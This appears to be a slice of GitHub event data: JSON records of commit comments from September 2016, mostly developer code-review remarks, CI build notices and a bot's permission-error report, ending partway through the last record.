{"id":"4620927198","type":"CommitCommentEvent","actor":{"login":"garg26"},"repo":{"name":"garg26/Discussion_Forum"},"payload":{"comment":{"id":19181693,"position":1,"line":1,"path":"README.md","commit_id":"adee1e0288446a7d49a429ecce59050c69665398","created_at":"2016-09-26T22:46:43Z","updated_at":"2016-09-26T22:46:43Z","body":"**Discussion Forum**"}},"created_at":"2016-09-26T22:46:43Z"}
{"id":"4620929570","type":"CommitCommentEvent","actor":{"login":"jnaulty"},"repo":{"name":"ansible/ansible"},"payload":{"comment":{"id":19181698,"position":null,"line":null,"path":null,"commit_id":"39aa740531f171a557e8604babd493793d63323e","created_at":"2016-09-26T22:47:13Z","updated_at":"2016-09-26T22:47:13Z","body":"This does not work when docker-py is version 1.10 or greater."}},"created_at":"2016-09-26T22:47:13Z"}
{"id":"4620930187","type":"CommitCommentEvent","actor":{"login":"dairel"},"repo":{"name":"dairel/milestone1"},"payload":{"comment":{"id":19181700,"position":null,"line":null,"path":null,"commit_id":"0f5519d628bd3c456be1a2774c6a1245094a0bb9","created_at":"2016-09-26T22:47:26Z","updated_at":"2016-09-26T22:47:26Z","body":"Ok"}},"created_at":"2016-09-26T22:47:26Z"}
{"id":"4620930491","type":"CommitCommentEvent","actor":{"login":"marmbrus"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":19181701,"position":157,"line":261,"path":"external/kafka-0-10-sql/src/main/scala/org/apache/spark/sql/kafka010/KafkaSourceProvider.scala","commit_id":"e1671525d142b249749fcd58d5d3bc325fc46c71","created_at":"2016-09-26T22:47:29Z","updated_at":"2016-09-26T22:47:29Z","body":"I didn't follow the reasoning about why its bad to start newly discovered partitions at the earliest available offset.  Doing anything other than that would make the result reliant on the specific processing time of the batch, which is counter to the guarantees we are trying to provide.  In the case of stateful operations with retries it could even cause inconsistent results.  I'd even go so far as to say that we should throw error or at least a warning in the case when data has been aged out of a newly discovered partition since otherwise we are silently missing data.\r\n\r\n> Failing that, name it app.start.offset.reset or something that conveys that you're only respecting it on initial application startup.\r\n\r\nI would like to avoid the words `auto` and `reset`, because I think they will lead to confusion that this is behaving similar to the kafka config, when really this is letting the user choose to backfill or not when starting a new streaming query.  I thought `startingoffset` was pretty clear that it only applied to the start of the query and not new partitions or behavior on resuming after a failure, but we should debate if there is something clearer.  Some options:\r\n - `startingoffset` = earliest/latest\r\n - `querystartoffset(s)` = earliest/latest\r\n - `backfill` = true/false\r\n\r\nOther ideas?"}},"created_at":"2016-09-26T22:47:29Z"}
{"id":"4620931093","type":"CommitCommentEvent","actor":{"login":"Izeren"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19181704,"position":8,"line":8,"path":"math-redactor/ExpressionTree/Expressions.h","commit_id":"cc753fb2a336fdd1165ad33bdd2d6eae072ec47f","created_at":"2016-09-26T22:47:39Z","updated_at":"2016-09-26T22:47:39Z","body":"Только сейчас слетела, сейчас поправлю"}},"created_at":"2016-09-26T22:47:39Z"}
{"id":"4620934610","type":"CommitCommentEvent","actor":{"login":"MilhouseVH"},"repo":{"name":"phil65/skin.estuary"},"payload":{"comment":{"id":19181712,"position":null,"line":null,"path":null,"commit_id":"f91ea5eb81ddf45beef72ed0aac1d5d4480c1b67","created_at":"2016-09-26T22:48:32Z","updated_at":"2016-09-26T22:48:32Z","body":"Perfect, thanks! Although as you point out, [ResetLabels()](https://github.com/xbmc/xbmc/blob/master/xbmc/windows/GUIWindowSystemInfo.cpp#L190) may need a tweak (@Memphiz).\r\n\r\nBefore:\r\n![s1](http://i.imgur.com/Io3cdHd.png)\r\n\r\nAfter:\r\n![s2](http://i.imgur.com/exU2Vpw.png)"}},"created_at":"2016-09-26T22:48:32Z"}
{"id":"4620935691","type":"CommitCommentEvent","actor":{"login":"xCryptic"},"repo":{"name":"aura-project/aura"},"payload":{"comment":{"id":19181719,"position":null,"line":null,"path":null,"commit_id":"5c03e7e7792c0a060f5ce72fe038fd3be2714715","created_at":"2016-09-26T22:48:49Z","updated_at":"2016-09-26T22:48:49Z","body":"Then what's the point of making it all on one line? I thought the only reason for this was localization."}},"created_at":"2016-09-26T22:48:49Z"}
{"id":"4620936847","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":19181723,"position":null,"line":null,"path":null,"commit_id":"8ef633ff039ee761436ec73ec323ec70a01d9ec8","created_at":"2016-09-26T22:49:06Z","updated_at":"2016-09-26T22:49:06Z","body":"TeamCity Xbim :: Xbim Windows UI :: Xbim Windows UI [Build 142](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1238&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) is now running\n"}},"created_at":"2016-09-26T22:49:06Z"}
{"id":"4620938562","type":"CommitCommentEvent","actor":{"login":"AwesomeMike"},"repo":{"name":"AwesomeMike/Annotation-Tool"},"payload":{"comment":{"id":19181728,"position":null,"line":null,"path":null,"commit_id":"6f89ac704b0c189a5c8c1913b68e1d2f5a2d4fcf","created_at":"2016-09-26T22:49:32Z","updated_at":"2016-09-26T22:49:32Z","body":"An example image."}},"created_at":"2016-09-26T22:49:32Z"}
{"id":"4620938589","type":"CommitCommentEvent","actor":{"login":"maxycode"},"repo":{"name":"EflyStudio/zhanqun-dby"},"payload":{"comment":{"id":19181729,"position":null,"line":null,"path":null,"commit_id":"d68d5df2b7d785ea4c69266c79d71e528d7a9e9d","created_at":"2016-09-26T22:49:32Z","updated_at":"2016-09-26T22:49:32Z","body":"重新整理缩进，在sublime里设置一下  将缩进统一调整为空格，设置一次缩进4个空格"}},"created_at":"2016-09-26T22:49:32Z"}
{"id":"4620939899","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":19181734,"position":null,"line":null,"path":null,"commit_id":"8ef633ff039ee761436ec73ec323ec70a01d9ec8","created_at":"2016-09-26T22:49:53Z","updated_at":"2016-09-26T22:49:53Z","body":"TeamCity Xbim :: Xbim Windows UI :: Xbim Windows UI [Build 142](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1238&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:48"}},"created_at":"2016-09-26T22:49:53Z"}
{"id":"4620939930","type":"CommitCommentEvent","actor":{"login":"Stanzilla"},"repo":{"name":"cmderdev/cmder"},"payload":{"comment":{"id":19181735,"position":null,"line":null,"path":null,"commit_id":"9c0ad9fd8139809f612a73d8a51d840be05794ea","created_at":"2016-09-26T22:49:54Z","updated_at":"2016-09-26T22:49:54Z","body":"@alexandr-san4ez I understood that, but what was the fix you suggested? Or did you say that it works pre this commit?"}},"created_at":"2016-09-26T22:49:54Z"}
{"id":"4620943213","type":"CommitCommentEvent","actor":{"login":"exectails"},"repo":{"name":"aura-project/aura"},"payload":{"comment":{"id":19181742,"position":null,"line":null,"path":null,"commit_id":"5c03e7e7792c0a060f5ce72fe038fd3be2714715","created_at":"2016-09-26T22:50:41Z","updated_at":"2016-09-26T22:50:41Z","body":"Consistency. The params overload for Intro will actually be removed once we don't need it anymore."}},"created_at":"2016-09-26T22:50:41Z"}
{"id":"4620943400","type":"CommitCommentEvent","actor":{"login":"DanAnastasyev"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19181743,"position":12,"line":12,"path":"formulas-converter/formulas-converter/main.cpp","commit_id":"fd51c966fb03316ff377eb405502afff33f79d4a","created_at":"2016-09-26T22:50:43Z","updated_at":"2016-09-26T22:50:43Z","body":"Для приличия можно было бы хоть раз delete написать"}},"created_at":"2016-09-26T22:50:43Z"}
{"id":"4620951277","type":"CommitCommentEvent","actor":{"login":"HinTak"},"repo":{"name":"mono/xwt"},"payload":{"comment":{"id":19181763,"position":null,"line":null,"path":null,"commit_id":"c58c6f22fe4346cc4a97b4cca21ca0a721f43927","created_at":"2016-09-26T22:52:41Z","updated_at":"2016-09-26T22:52:41Z","body":"The suggestion seems wrong - why would `Label.StyleGetProperty...` return a Gdk.Color type? So the if is always false, and color is never changed from Zero."}},"created_at":"2016-09-26T22:52:41Z"}
{"id":"4620958542","type":"CommitCommentEvent","actor":{"login":"vladen"},"repo":{"name":"Travix-International/frint"},"payload":{"comment":{"id":19181775,"position":270,"line":270,"path":"src/createApp.js","commit_id":"8b73173fae485e0cf995a035db7d1da649e277ca","created_at":"2016-09-26T22:54:30Z","updated_at":"2016-09-26T22:54:30Z","body":"With maybe monad such code could be a bit more expressive (and slower) ;)\r\n\r\n```javascript\r\nimport { isFunction, isNil } from 'lodash';\r\n\r\nfunction maybe(getter, ifSome, ifNone) {\r\n  const value = isFunction(getter) ? getter() : getter;\r\n  return isNil(value)\r\n    ? isFunction(ifNone) ? ifNone() : ifNone\r\n    : isFunction(ifSome) ? ifSome(value) : ifSome;\r\n}\r\n\r\nexport default function createApp(options = {}) {\r\n  class App extends BaseApp {\r\n    getService(serviceName) {\r\n      return maybe(\r\n        serviceInstances[serviceName],\r\n        _.identity,\r\n        maybe(\r\n          () => this.getRootApp(),\r\n          rootApp => rootApp.getService(serviceName),\r\n          null));\r\n    }\r\n```\r\n\r\n"}},"created_at":"2016-09-26T22:54:30Z"}
{"id":"4620960401","type":"CommitCommentEvent","actor":{"login":"HinTak"},"repo":{"name":"mono/xwt"},"payload":{"comment":{"id":19181778,"position":null,"line":null,"path":null,"commit_id":"c58c6f22fe4346cc4a97b4cca21ca0a721f43927","created_at":"2016-09-26T22:54:59Z","updated_at":"2016-09-26T22:54:59Z","body":"I think StyleGetProperty() returns either a number or a string? Just blind guess , from its name. Don't think it should returns anything else?"}},"created_at":"2016-09-26T22:54:59Z"}
{"id":"4620961617","type":"CommitCommentEvent","actor":{"login":"robcore"},"repo":{"name":"robcore/machinex"},"payload":{"comment":{"id":19181780,"position":null,"line":null,"path":null,"commit_id":"a704f73ecde50566ae6c8bcd54242de3905ef906","created_at":"2016-09-26T22:55:17Z","updated_at":"2016-09-26T22:55:17Z","body":"Hey John,\nWhile we're add it, upon doing some more testing, I've updated the values\nagain (it's an ongoing experiment) to 11 and 22, respectively.  Quality is\ncrystal clear even when boosted with faux sound.\n\nFood for thought!\n\nOn Tue, Sep 20, 2016 at 3:58 AM, John <notifications@github.com> wrote:\n\n> Cherry-picking is quite simple - https://ariejan.net/2010/06/\n> 10/cherry-picking-specific-commits-from-another-branch/\n> If you want to cherry-pick from another repo - just execute \"git fetch\n> url-to-repo\" in your local git repository before picking - at least thats\n> how I'm doing this :)\n> Btw. sometimes there might be a conflict - then use \"git status\" to see\n> which files are affected so you can manually merge code. Then just add this\n> file (files) and execute \"git cherry-pick --continue\".\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/robcore/machinex/commit/a704f73ecde50566ae6c8bcd54242de3905ef906#commitcomment-19093633>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACjHoJuYASuNPC4Ht04Y0iCe-hbxflqPks5qr65LgaJpZM4KAkH3>\n> .\n>\n"}},"created_at":"2016-09-26T22:55:17Z"}
{"id":"4620964693","type":"CommitCommentEvent","actor":{"login":"nathanallen"},"repo":{"name":"amblount/express-personal-api"},"payload":{"comment":{"id":19181797,"position":67,"line":39,"path":"seed.js","commit_id":"b159ece4f159fc0492ebfe8aec693daa51c51081","created_at":"2016-09-26T22:56:03Z","updated_at":"2016-09-26T22:56:03Z","body":"Be _very_ careful where you place `process.exit()` in your code. Although you have it on line 39, you are using async callbacks on lines 6 and 33 -- as soon as you hit line 39 you could very well interrupt your callbacks!"}},"created_at":"2016-09-26T22:56:03Z"}
{"id":"4620973578","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19181826,"position":null,"line":null,"path":null,"commit_id":"2aac83173bbf0f92e0737b596988034aec3edbe0","created_at":"2016-09-26T22:58:19Z","updated_at":"2016-09-26T22:58:19Z","body":"@ElbertoOne My impression (sorry for the late comment) is that you should have set the same ck (and about the same range width) for all the tuned parameters (or at least for every midgame/endgame value), since they are all on the same scale; I believe that would help SPSA tuning a lot... In your test some values will move 20+ times faster than others..."}},"created_at":"2016-09-26T22:58:19Z"}
{"id":"4620979572","type":"CommitCommentEvent","actor":{"login":"psawaya"},"repo":{"name":"apollostack/apollo-server"},"payload":{"comment":{"id":19181847,"position":13,"line":14,"path":"integrations.md","commit_id":"321847ee5761aa7477da99f0f589a96441a513fe","created_at":"2016-09-26T22:59:47Z","updated_at":"2016-09-26T22:59:47Z","body":"Typo?"}},"created_at":"2016-09-26T22:59:47Z"}
{"id":"4620983497","type":"CommitCommentEvent","actor":{"login":"qguv"},"repo":{"name":"cs444-defectives/nachos"},"payload":{"comment":{"id":19181866,"position":null,"line":null,"path":null,"commit_id":"1ce1359d6fffe2d899b31768daf8b630d24c2855","created_at":"2016-09-26T23:00:44Z","updated_at":"2016-09-26T23:00:44Z","body":"I think I was going to write some debug code but I worked around it instead. [Reverted.](https://github.com/cs444-defectives/nachos/commit/9c1e6dd21351e6f5a5f65d7075b6ba74f3d04d9e)"}},"created_at":"2016-09-26T23:00:44Z"}
{"id":"4620983613","type":"CommitCommentEvent","actor":{"login":"HinTak"},"repo":{"name":"mono/xwt"},"payload":{"comment":{"id":19181868,"position":null,"line":null,"path":null,"commit_id":"c58c6f22fe4346cc4a97b4cca21ca0a721f43927","created_at":"2016-09-26T23:00:45Z","updated_at":"2016-09-26T23:00:45Z","body":"It would be up to the implicit cast operator in Gdk.Color to convert that string or number to a color value. Without a cast, it can't be a Gdk.Color?"}},"created_at":"2016-09-26T23:00:45Z"}
{"id":"4621001788","type":"CommitCommentEvent","actor":{"login":"craftytrickster"},"repo":{"name":"servo/servo"},"payload":{"comment":{"id":19181920,"position":99,"line":397,"path":"components/style/properties/properties.mako.rs","commit_id":"51e642e875ea25502b92967358e32a30e06ab3dd","created_at":"2016-09-26T23:05:14Z","updated_at":"2016-09-26T23:05:14Z","body":"Hi @birtles , no problem. When I was trying to get this to work, I realized that that I was having trouble determining if the whitespace after `left: ` was the result of nice formatting, of if it was actually intentionally part of the var reference value. If you think about it if a user writes `color:     green;`, we know they really mean `color: green;`, but for var references, it is not so obvious.\r\n\r\nLet me know if you have any other questions. In the meantime, perhaps https://github.com/servo/servo/pull/9410#issuecomment-199929959 can serve as the definitive answer."}},"created_at":"2016-09-26T23:05:14Z"}
{"id":"4621010130","type":"CommitCommentEvent","actor":{"login":"katejeffreys"},"repo":{"name":"Polymer/docs"},"payload":{"comment":{"id":19181945,"position":null,"line":null,"path":null,"commit_id":"bbd15f0eb9abcab5c57dead03c3dfc52168dcf21","created_at":"2016-09-26T23:07:17Z","updated_at":"2016-09-26T23:07:17Z","body":"The same typo is present in the bullet point above this one:\r\n\r\n\"For a single property observer, the rules are identical to a simple observer: the observer is called each time an observable change is made **to of the** dependencies, even if the new value for the path is undefined.\""}},"created_at":"2016-09-26T23:07:17Z"}
{"id":"4621013978","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":19181960,"position":61,"line":469,"path":"android/src/com/frostwire/android/gui/util/UIUtils.java","commit_id":"b10a52539dcbddb8df0db6af4904e64f578843a4","created_at":"2016-09-26T23:08:14Z","updated_at":"2016-09-26T23:08:14Z","body":"This is for sure not the most pleasant code :)"}},"created_at":"2016-09-26T23:08:14Z"}
{"id":"4621013979","type":"CommitCommentEvent","actor":{"login":"sevoku"},"repo":{"name":"mono/xwt"},"payload":{"comment":{"id":19181959,"position":null,"line":null,"path":null,"commit_id":"c58c6f22fe4346cc4a97b4cca21ca0a721f43927","created_at":"2016-09-26T23:08:14Z","updated_at":"2016-09-26T23:08:14Z","body":"Oh sry, I looked at the wrong Gtk-sharp version. v3 simply catches exceptions (https://github.com/mono/gtk-sharp/blob/master/gtk/Widget.cs#L227-L260) instead of checking the return code (Gtk2: https://github.com/mono/gtk-sharp/blob/gtk-sharp-2-12-branch/gtk/Widget.custom#L333.\r\nBUT its still valid: previous Gtk versions (<=3.18) always return a valid Gdk.Color (which is Gdk.Color.Zero in case its not defined in the theme). Newer Gtk (>3.18) checks whether its defined or not and return `null` instead of `Gdk.Color.Zero`."}},"created_at":"2016-09-26T23:08:14Z"}
{"id":"4621016018","type":"CommitCommentEvent","actor":{"login":"watson"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19181967,"position":null,"line":null,"path":null,"commit_id":"4f55158587ab2b701c11085bd39c57d9edb3ea94","created_at":"2016-09-26T23:08:45Z","updated_at":"2016-09-26T23:08:45Z","body":"@trevnorris excuse my noob question, but does this mean that the AsyncHook events will fire for each timer, even for timers sharing the same handle?"}},"created_at":"2016-09-26T23:08:45Z"}
{"id":"4621022640","type":"CommitCommentEvent","actor":{"login":"sevoku"},"repo":{"name":"mono/xwt"},"payload":{"comment":{"id":19181986,"position":null,"line":null,"path":null,"commit_id":"c58c6f22fe4346cc4a97b4cca21ca0a721f43927","created_at":"2016-09-26T23:10:27Z","updated_at":"2016-09-26T23:10:27Z","body":"Hence this should work fine for both:\r\n```\r\n    var colorVal = Label.StyleGetProperty (\"link-color\");\r\n    if (colorVal is Gdk.Color)\r\n        color = (Gdk.Color)colorVal;\r\n```\r\nand covers the case when StyleGetProperty wouldn't return a Color or null (but something different which is not valid for us)."}},"created_at":"2016-09-26T23:10:27Z"}
{"id":"4621024895","type":"CommitCommentEvent","actor":{"login":"kumpera"},"repo":{"name":"rolfbjarne/HockeySDK-Xamarin"},"payload":{"comment":{"id":19181991,"position":10,"line":32,"path":"source/HockeySDK.iOSBindings/Additions.cs","commit_id":"862721199f1adec210bfc7b1943f975ffb8048a9","created_at":"2016-09-26T23:11:02Z","updated_at":"2016-09-26T23:11:02Z","body":"This is wrong.\r\n\r\nThe right pattern must be be:\r\n`` \r\ntry{}\r\nfinally {\r\nRemoveSignalHandlers ();\r\n  try {\r\n   DoStartManager ();\r\n  } finally {\r\n  InstallSignalHandlers();\r\n }\r\n}```"}},"created_at":"2016-09-26T23:11:02Z"}
{"id":"4621025123","type":"CommitCommentEvent","actor":{"login":"korymath"},"repo":{"name":"twitter/torch-twrl"},"payload":{"comment":{"id":19181993,"position":null,"line":null,"path":null,"commit_id":"07533a8400d0b3037c5e59f8e93c3c5a5ab98714","created_at":"2016-09-26T23:11:06Z","updated_at":"2016-09-26T23:11:06Z","body":"Ensure that the full table is printed, regardless of interpreter."}},"created_at":"2016-09-26T23:11:06Z"}
{"id":"4621026159","type":"CommitCommentEvent","actor":{"login":"MrMC"},"repo":{"name":"koying/SPMC"},"payload":{"comment":{"id":19181997,"position":null,"line":null,"path":null,"commit_id":"e4acb69a5378d5f9080579a0c3afc24a49036224","created_at":"2016-09-26T23:11:22Z","updated_at":"2016-09-26T23:11:22Z","body":"should do a PostMsg, SendMsg is sync and expects caller to be in main gui thread."}},"created_at":"2016-09-26T23:11:22Z"}
{"id":"4621026162","type":"CommitCommentEvent","actor":{"login":"yamajun"},"repo":{"name":"trueos/trueos-desktop"},"payload":{"comment":{"id":19181996,"position":null,"line":null,"path":null,"commit_id":"6c13e1fbf58152a4cbcf14986aa66ee4c4c1272a","created_at":"2016-09-26T23:11:22Z","updated_at":"2016-09-26T23:11:22Z","body":"Oh... I didn't checked here.  Thanks."}},"created_at":"2016-09-26T23:11:22Z"}
{"id":"4621028918","type":"CommitCommentEvent","actor":{"login":"davisagli"},"repo":{"name":"zopefoundation/AccessControl"},"payload":{"comment":{"id":19182005,"position":5,"line":87,"path":"include/ExtensionClass/ExtensionClass.h","commit_id":"79aacd8b4951f333a950e86f7c9feed4dce3d7cf","created_at":"2016-09-26T23:12:04Z","updated_at":"2016-09-26T23:12:04Z","body":"This flag is checked to see if we have a Python that supports new-style classes. Setting it to 0 is almost certainly wrong because in Python 3 we *only* have new-style classes. Instead I think we want preprocessor conditionals to only do the check in Python 2. See for example how it was handled in zope.proxy: https://github.com/zopefoundation/zope.proxy/commit/47481643a89272efeb1a767cc6e8e21efdfa1cc9#diff-48220ec482a37b43d11f14b9e3f2d807R344"}},"created_at":"2016-09-26T23:12:04Z"}
{"id":"4621028982","type":"CommitCommentEvent","actor":{"login":"vladen"},"repo":{"name":"Travix-International/frint"},"payload":{"comment":{"id":19182006,"position":13,"line":13,"path":"src/createService.js","commit_id":"8b73173fae485e0cf995a035db7d1da649e277ca","created_at":"2016-09-26T23:12:05Z","updated_at":"2016-09-26T23:12:05Z","body":"Seems like `_.bindAll(this, _.functions(this));` does the same trick (lodash 0.1.0+)\r\n\r\nLinks to docs:\r\n* [bindAll](https://lodash.com/docs/4.16.2#bindAll)\r\n* [functions](https://lodash.com/docs/4.16.2#functions)"}},"created_at":"2016-09-26T23:12:05Z"}
{"id":"4621029337","type":"CommitCommentEvent","actor":{"login":"moskupols"},"repo":{"name":"ValeriyKnyazhev/ModuleHighlightingAndAutoCompleteon"},"payload":{"comment":{"id":19182008,"position":128,"line":30,"path":"ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutocomplete.cpp","commit_id":"b194eed32795f549bd11e187adae9da93ddcff3b","created_at":"2016-09-26T23:12:10Z","updated_at":"2016-09-26T23:12:10Z","body":"Так у нас и задание на эту неделю сформулировано двумя общими словами."}},"created_at":"2016-09-26T23:12:10Z"}
{"id":"4621036545","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"vnkumar27/dsp"},"payload":{"comment":{"id":19182035,"position":null,"line":null,"path":null,"commit_id":"761653edc6682abec50a4910ce5220eed344f22d","created_at":"2016-09-26T23:13:59Z","updated_at":"2016-09-26T23:13:59Z","body":"RE: 05a-python.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @rsampath\r\n\r\nHello @vnkumar27 \r\n\r\nNice work on the Python problems! Here are some comments:\r\n- Q1: Position/ordering is important in both tuples and lists.\r\n- Q2: Searching through a set is faster because set elements are hashable. On the other hand, stepping through all elements is faster in a list.\r\n- Nice work with markdown. Note that you can make snippets of code more easily readable if you insert them between back ticks. Or if you have several lines of code, insert them between two lines with three back ticks on each.\r\n- Q5: There are `datetime` methods that allow you to decode a date/time string according to a predefined format. This is better than doing it manually, as you have done. \r\n- Q6: `not_bad` is not quite working as it should. For example, `not_bad(\"This is not bad acting!\")` should return \"This is good acting!\", but it returns \"This is good\".\r\n- Q8: This is not working. The `teams` list is empty, because the file has already been read once to fill the `values` list. Either \"rewind\" the file, or reorganize your code to read in the `values` and `teams` lists at the same time.\r\n\r\n👍 "}},"created_at":"2016-09-26T23:13:59Z"}
{"id":"4621047153","type":"CommitCommentEvent","actor":{"login":"panpawn"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19182074,"position":null,"line":null,"path":null,"commit_id":"3280e453f66055fa5547798dc3467b532da79bef","created_at":"2016-09-26T23:16:51Z","updated_at":"2016-09-26T23:16:51Z","body":"Isn't this as hacky as my approach? "}},"created_at":"2016-09-26T23:16:51Z"}
{"id":"4621056636","type":"CommitCommentEvent","actor":{"login":"rtholmes"},"repo":{"name":"CS310-2016Fall/cpsc310d1public"},"payload":{"comment":{"id":19182108,"position":null,"line":null,"path":null,"commit_id":"85b68b4ddc0a5698ec44c4a734dbcf4cdfe7dd2e","created_at":"2016-09-26T23:19:17Z","updated_at":"2016-09-26T23:19:17Z","body":"@CPSC310Bot "}},"created_at":"2016-09-26T23:19:17Z"}
{"id":"4621057740","type":"CommitCommentEvent","actor":{"login":"AXDOOMER"},"repo":{"name":"freedoom/freedoom"},"payload":{"comment":{"id":19182112,"position":null,"line":null,"path":null,"commit_id":"13bcf645e076cebbd937a1aa7317608ffa8b6bb7","created_at":"2016-09-26T23:19:35Z","updated_at":"2016-09-26T23:19:35Z","body":"Sorry about that. I did it quickly and had a problem with the commit that resulted in the pull request wanting to commit three different things that were all the same. Git is not my cup of tea. Next time the message is going to be more descriptive. "}},"created_at":"2016-09-26T23:19:35Z"}
{"id":"4621062944","type":"CommitCommentEvent","actor":{"login":"Trott"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19182129,"position":7,"line":63,"path":"lib/buffer.js","commit_id":"27e84ddd4e10cdb40d6e89d872277abe16830eb0","created_at":"2016-09-26T23:20:55Z","updated_at":"2016-09-26T23:20:55Z","body":"@bnoordhuis If we wanted to run a test that exercised the right hand side of the `||` below, how would we do that? Like, what does it mean to \"not own the ArrayBuffer allocator\"? Is this a test that can be performed in JS-land or not so much? /cc @oogz "}},"created_at":"2016-09-26T23:20:55Z"}
{"id":"4621068510","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19182158,"position":null,"line":null,"path":null,"commit_id":"1b276fccd6e727a840ac706ab95b1255f6e48696","created_at":"2016-09-26T23:22:20Z","updated_at":"2016-09-26T23:22:20Z","body":"Submitting the task to TaskCluster failed. You didn't give the task-graph scopes allowing it define tasks on the queue.Details:\n\n```js\n[\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:index.project.releng.opencloudconfig.v1.revision.1b276fccd6e727a840ac706ab95b1255f6e48696.validation\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/OpenCloudConfig:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:index.project.releng.opencloudconfig.v1.revision.1b276fccd6e727a840ac706ab95b1255f6e48696.validation\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"OLDvap4WTzCmGla17qdlFw\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"routes\\\": [\\n    \\\"index.project.releng.opencloudconfig.v1.revision.1b276fccd6e727a840ac706ab95b1255f6e48696.validation\\\"\\n  ],\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"data\\\": {\\n      \\\"base\\\": {\\n        \\\"sha\\\": \\\"a41b2c9df1641b2776a283324acc78675a0ed251\\\",\\n        \\\"user\\\": {\\n          \\\"login\\\": \\\"mozilla-releng\\\"\\n        }\\n      },\\n      \\\"head\\\": {\\n        \\\"sha\\\": \\\"1b276fccd6e727a840ac706ab95b1255f6e48696\\\",\\n        \\\"user\\\": {\\n          \\\"email\\\": \\\"gregory.szorc@gmail.com\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 600,\\n    \\\"image\\\": \\\"grenade/opencloudconfig\\\",\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"--login\\\",\\n      \\\"-c\\\",\\n      \\\"git clone --quiet https://github.com/indygreg/OpenCloudConfig.git && cd OpenCloudConfig && git checkout master && echo \\\\\\\"do lint stuff here\\\\\\\"\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.opened\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 11,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/OpenCloudConfig.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"a41b2c9df1641b2776a283324acc78675a0ed251\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/indygreg/OpenCloudConfig.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"indygreg\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"1b276fccd6e727a840ac706ab95b1255f6e48696\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"gregory.szorc@gmail.com\\\"\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Validate submission (not implemented)\\\",\\n    \\\"description\\\": \\\"todo: run a linter against json and powershell files\\\",\\n    \\\"owner\\\": \\\"gregory.szorc@gmail.com\\\",\\n    \\\"source\\\": \\\"https://github.com/indygreg/OpenCloudConfig.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-26T23:22:20.663Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-27T23:22:20.663Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"MpcwZMTjSyW0bUz9oHALig\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-27T23:22:20.663Z\\\"\\n}\\n  time:     